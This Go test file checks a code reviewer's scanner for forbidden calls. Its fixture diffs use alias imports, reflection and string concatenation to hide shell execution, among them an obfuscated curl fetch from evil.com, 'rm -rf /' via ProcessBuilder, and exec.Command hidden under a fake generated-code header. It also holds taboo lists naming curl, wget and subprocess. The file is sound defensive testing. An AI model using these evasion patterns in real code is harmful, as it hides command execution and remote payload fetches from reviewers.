package reviewer

import (
	"context"
	"os"
	"path/filepath"
	"strings"
	"testing"

	"artix/pkg/persona"
	"artix/pkg/sandbox"
	"artix/pkg/steering"
	"socratix/pkg/model"
)

func TestTabooCorpus_Go_AliasImport_Rejected(t *testing.T) {
	taboos := []string{"exec.Command", "os/exec", "reflect"}

	cases := []struct {
		name string
		diff string
	}{
		{
			name: "named_alias_exec",
			diff: `diff --git a/pkg/tool/runner.go b/pkg/tool/runner.go
--- a/pkg/tool/runner.go
+++ b/pkg/tool/runner.go
@@ -1,5 +1,7 @@
 package tool
+import myexec "os/exec"
+func RunCmd(c string) {
+	cmd := myexec.Command(c)
+	_ = cmd.Run()
+}
`,
		},
		{
			name: "named_alias_reflect",
			diff: `diff --git a/pkg/tool/inspect.go b/pkg/tool/inspect.go
--- a/pkg/tool/inspect.go
+++ b/pkg/tool/inspect.go
@@ -1,5 +1,7 @@
 package tool
+import r "reflect"
+func Inspect(v any) {
+	_ = r.ValueOf(v)
+}
`,
		},
		{
			name: "dot_import_exec",
			diff: `diff --git a/pkg/tool/exec.go b/pkg/tool/exec.go
--- a/pkg/tool/exec.go
+++ b/pkg/tool/exec.go
@@ -1,5 +1,7 @@
 package tool
+import . "os/exec"
+func RunDot(c string) {
+	_ = Command(c)
+}
`,
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			violations := CheckSemanticASTTaboos(tc.diff, taboos)
			if len(violations) == 0 {
				t.Fatalf("expected AST taboo violation for alias import bypass in %s, got 0", tc.name)
			}
		})
	}
}

func TestTabooCorpus_Go_Reflection_Rejected(t *testing.T) {
	taboos := []string{"reflect", "reflection", "exec.Command"}

	diff := `diff --git a/pkg/danger/dyn.go b/pkg/danger/dyn.go
--- a/pkg/danger/dyn.go
+++ b/pkg/danger/dyn.go
@@ -1,5 +1,8 @@
 package danger
 import "reflect"
 func InvokeDyn(target any, methodName string) {
+	val := reflect.ValueOf(target)
+	m := val.MethodByName(methodName)
+	m.Call(nil)
 }
`
	violations := CheckSemanticASTTaboos(diff, taboos)
	if len(violations) == 0 {
		t.Fatalf("expected AST taboo violation for reflection invocation, got 0")
	}
}

func TestTabooCorpus_Go_StringConcat_Rejected(t *testing.T) {
	taboos := []string{"curl", "wget", "exec.Command"}

	diff := `diff --git a/pkg/net/fetch.go b/pkg/net/fetch.go
--- a/pkg/net/fetch.go
+++ b/pkg/net/fetch.go
@@ -1,5 +1,8 @@
 package net
 import "os/exec"
 func FetchScript() {
+	prog := "c" + "u" + "r" + "l"
+	url := "http" + "s://evil.com/payload.sh"
+	_ = exec.Command(prog, url)
 }
`
	violations := CheckSemanticASTTaboos(diff, taboos)
	if len(violations) == 0 {
		t.Fatalf("expected AST taboo violation for string concatenation bypass, got 0")
	}
}

func TestTabooCorpus_Go_GeneratedFile_Rejected(t *testing.T) {
	taboos := []string{"exec.Command", "os/exec"}

	// Attackers trying to hide taboos behind code generation headers or gen filenames
	diff := `diff --git a/pkg/proto/service.pb.go b/pkg/proto/service.pb.go
new file mode 100644
--- /dev/null
+++ b/pkg/proto/service.pb.go
@@ -0,0 +1,9 @@
+// Code generated by protoc-gen-go. DO NOT EDIT.
+// source: service.proto
+
+package proto
+import "os/exec"
+func HiddenExec() {
+	_ = exec.Command("bash", "-c", "id")
+}
`
	violations := CheckSemanticASTTaboos(diff, taboos)
	if len(violations) == 0 {
		t.Fatalf("expected AST taboo violation in generated file, scanner must not ignore generated files")
	}
}

func TestTabooCorpus_Python_AliasAndReflection_Rejected(t *testing.T) {
	taboos := []string{"subprocess", "os.system", "eval"}

	cases := []struct {
		name string
		diff string
	}{
		{
			name: "python_alias_import",
			diff: `diff --git a/script.py b/script.py
--- a/script.py
+++ b/script.py
@@ -1,3 +1,5 @@
+import subprocess as sp
+sp.Popen(["ls", "-la"])
`,
		},
		{
			name: "python_getattr_reflection",
			diff: `diff --git a/script.py b/script.py
--- a/script.py
+++ b/script.py
@@ -1,3 +1,5 @@
+import os
+f = getattr(os, "sys" + "tem")
+f("id")
`,
		},
		{
			name: "python_from_alias",
			diff: `diff --git a/script.py b/script.py
--- a/script.py
+++ b/script.py
@@ -1,3 +1,5 @@
+from os import system as sys_exec
+sys_exec("whoami")
`,
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			violations := CheckSemanticASTTaboos(tc.diff, taboos)
			if len(violations) == 0 {
				t.Fatalf("expected semantic taboo violation for Python bypass in %s, got 0", tc.name)
			}
		})
	}
}

func TestTabooCorpus_JSTS_AliasAndStringConcat_Rejected(t *testing.T) {
	taboos := []string{"child_process", "eval"}

	cases := []struct {
		name string
		diff string
	}{
		{
			name: "ts_import_alias",
			diff: `diff --git a/src/index.ts b/src/index.ts
--- a/src/index.ts
+++ b/src/index.ts
@@ -1,3 +1,5 @@
+import * as cp from "child_process";
+cp.execSync("whoami");
`,
		},
		{
			name: "js_require_concat",
			diff: `diff --git a/src/index.js b/src/index.js
--- a/src/index.js
+++ b/src/index.js
@@ -1,3 +1,5 @@
+const mod = require("child" + "_process");
+mod.spawn("bash");
`,
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			violations := CheckSemanticASTTaboos(tc.diff, taboos)
			if len(violations) == 0 {
				t.Fatalf("expected semantic taboo violation for JS/TS bypass in %s, got 0", tc.name)
			}
		})
	}
}

func TestTabooCorpus_FullPostPatchTreeScan(t *testing.T) {
	tmpDir := t.TempDir()

	// File 1: Normal modified file
	file1 := filepath.Join(tmpDir, "app.go")
	if err := os.WriteFile(file1, []byte("package main\n\nfunc Run() int {\n\treturn 42\n}\n"), 0644); err != nil {
		t.Fatal(err)
	}

	// File 2: Pre-existing or generated file in tree with taboo
	file2 := filepath.Join(tmpDir, "helper_generated.go")
	if err := os.WriteFile(file2, []byte("// Code generated by tool. DO NOT EDIT.\npackage main\nimport \"os/exec\"\nfunc RunBypass() {\n\t_ = exec.Command(\"sh\")\n}\n"), 0644); err != nil {
		t.Fatal(err)
	}

	// Diff only touches app.go
	diff := `diff --git a/app.go b/app.go
--- a/app.go
+++ b/app.go
@@ -1,4 +1,5 @@
 package main
 func Run() int {
+	RunBypass()
 	return 42
 }
`
	taboos := []string{"exec.Command", "os/exec"}

	// When scanning workspaceDir, full post-patch tree is scanned and detects taboo in helper_generated.go
	violations := CheckSemanticASTTaboos(diff, taboos, tmpDir)
	if len(violations) == 0 {
		t.Fatalf("expected full post-patch tree scan to catch taboo in helper_generated.go, got 0 violations")
	}
}

func TestReviewer_ScanMode_ExplicitReporting(t *testing.T) {
	reg := persona.NewRegistry("")
	rev := NewAdversarialReviewer(reg)
	rev.SetCritic(func(ctx context.Context, prompt string) (string, error) {
		return `{"approved":true,"blocking":[],"warnings":[]}`, nil
	})

	ctx := &ReviewContext{
		Diff: "--- a/file.go\n+++ b/file.go\n@@ -1 +1 @@\n-old\n+new",
		TestResults: []*sandbox.ExecResult{
			{
				Command:  "go test ./...",
				ExitCode: 0,
			},
		},
		SteeringContext: &steering.PersonaSteeringContext{
			Taboos: model.TabooSpace{
				ForbiddenArguments: []string{"exec.Command"},
			},
		},
	}

	verdict := rev.Evaluate(ctx)
	if verdict.ScanMode != "diff-literal | AST" && verdict.ScanMode != "AST" {
		t.Errorf("expected verdict.ScanMode to be 'diff-literal | AST' or 'AST', got %q", verdict.ScanMode)
	}

	if !strings.Contains(verdict.Summary, "scan mode: diff-literal | AST") && !strings.Contains(verdict.Summary, "scan mode: AST") && verdict.ScanMode == "" {
		t.Errorf("expected review output to explicitly report scan mode, got summary: %q", verdict.Summary)
	}
}

func TestKotlinAndSwift_BypassCorpus_AndHeuristicScanModeReporting(t *testing.T) {
	reg := persona.NewRegistry("")
	rev := NewAdversarialReviewer(reg)
	rev.SetCritic(func(ctx context.Context, prompt string) (string, error) {
		return `{"approved":true,"blocking":[],"warnings":[]}`, nil
	})

	testCases := []struct {
		name string
		diff string
	}{
		{
			name: "Kotlin import alias bypass",
			diff: "diff --git a/Runner.kt b/Runner.kt\n--- a/Runner.kt\n+++ b/Runner.kt\n@@ -0,0 +1,4 @@\n+import java.lang.Runtime as EvilRuntime\n+class Runner {\n+    fun runCmd() { EvilRuntime.getRuntime().exec(\"id\") }\n+}",
		},
		{
			name: "Kotlin Class.forName string concatenation bypass",
			diff: "diff --git a/Service.kt b/Service.kt\n--- a/Service.kt\n+++ b/Service.kt\n@@ -0,0 +1,3 @@\n+class Service {\n+    fun sneaky() { Class.forName(\"java.lang.\" + \"Runtime\").getMethod(\"getRuntime\").invoke(null) }\n+}",
		},
		{
			name: "Kotlin typealias bypass",
			diff: "diff --git a/Task.kt b/Task.kt\n--- a/Task.kt\n+++ b/Task.kt\n@@ -0,0 +1,4 @@\n+typealias PB = java.lang.ProcessBuilder\n+class Task {\n+    fun execute() { PB(\"rm\", \"-rf\", \"/\").start() }\n+}",
		},
		{
			name: "Swift typealias bypass",
			diff: "diff --git a/ProcessRunner.swift b/ProcessRunner.swift\n--- a/ProcessRunner.swift\n+++ b/ProcessRunner.swift\n@@ -0,0 +1,4 @@\n+typealias TaskRunner = Process\n+class ProcessRunner {\n+    func execute() { let t = TaskRunner(); t.launch() }\n+}",
		},
		{
			name: "Swift NSClassFromString concat bypass",
			diff: "diff --git a/AppService.swift b/AppService.swift\n--- a/AppService.swift\n+++ b/AppService.swift\n@@ -0,0 +1,3 @@\n+class AppService {\n+    func dynamicTask() { let cls = NSClassFromString(\"NS\" + \"Task\") }\n+}",
		},
	}

	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			ctx := &ReviewContext{
				Diff: tc.diff,
				TestResults: []*sandbox.ExecResult{
					{Command: "test", ExitCode: 0},
				},
				SteeringContext: &steering.PersonaSteeringContext{
					Taboos: model.TabooSpace{
						ForbiddenArguments: []string{"runtime.exec", "processbuilder", "process()"},
					},
				},
			}
			verdict := rev.Evaluate(ctx)

			// 1. Must catch the taboo bypass
			if verdict.Approved || len(verdict.BlockingIssues) == 0 {
				t.Errorf("[%s] expected reviewer to reject bypass diff, got approved: %+v", tc.name, verdict)
			}

			// 2. Must report ScanMode as heuristic for Kotlin / Swift files
			if verdict.ScanMode != "heuristic" {
				t.Errorf("[%s] expected ScanMode 'heuristic' for non-Go file, got %q", tc.name, verdict.ScanMode)
			}
		})
	}
}

func TestPublicDocs_DocumentScanModeHeuristicForKotlinAndSwift(t *testing.T) {
	guidePath := filepath.Join("..", "..", "docs", "USER_GUIDE.md")
	data, err := os.ReadFile(guidePath)
	if err != nil {
		t.Fatalf("failed to read %s: %v", guidePath, err)
	}
	content := string(data)

	if !strings.Contains(content, "scan mode: heuristic") && !strings.Contains(content, "scan mode: `heuristic`") {
		t.Errorf("USER_GUIDE.md must disclose that non-Go languages (Kotlin, Swift) use heuristic scan mode")
	}
	if !strings.Contains(strings.ToLower(content), "kotlin") || !strings.Contains(strings.ToLower(content), "swift") {
		t.Errorf("USER_GUIDE.md must mention Kotlin and Swift in scan mode documentation")
	}
}


